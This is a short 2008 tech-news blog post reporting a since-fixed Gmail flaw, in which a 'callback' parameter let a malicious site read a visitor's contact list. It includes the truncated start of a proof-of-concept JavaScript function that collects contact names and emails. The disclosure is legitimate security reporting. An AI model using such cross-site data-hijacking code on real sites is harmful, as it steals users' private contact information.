• Home
• About
• Contact Us

Subscribe

• Apple/Mac
• Cell Phones
• Digital Music
• Enterprise Tech
• Gaming
• Google
• Hardware
• HD DVD & TV
• Internet
• Linux/Open Source
• Microsoft
• Mobile & Wireless
• Personal Tech
• RSS & Blogging
• Security
• Software

Serious Gmail vulnerability fixed

After posting my last article about the contacts "JSON API", Haochi Chen discovered that by simply appending a "callback" variable in the URL, the creators of a malicious site could gain access to a visitors entire Gmail contact list without warning.
<script language="javascript">     function getContacts(response){       var output = "";       for(x=0;x<response.Body.Contacts.length;x++){         output += response.Body.Contacts[x].Name + " <" + response.Body.Contacts[x].Email […]

Latest Stories

• Customers line up for new BlackBerry Storm (CNET)
• Web sites offer real estate agent rankings (AP)
• Sun, Microsoft boost IDEs (InfoWorld)
• Broadband makes tiny town an English-teaching hub (AP)
• Florida teen kills self in front of live webcam (Reuters)
• Microsoft exec: No job cuts here (AP)
• Microsoft modifies Zune subscription model (Reuters)
• Google unveils custom search, kills Lively (AFP)
• Hundreds wait at Verizon stores for BlackBerry Storm (Reuters)
• New European online library crashes under weight of interest (AFP)

Advertisement

Copyright © 2008 Technology Magazine · Login · Privacy Statement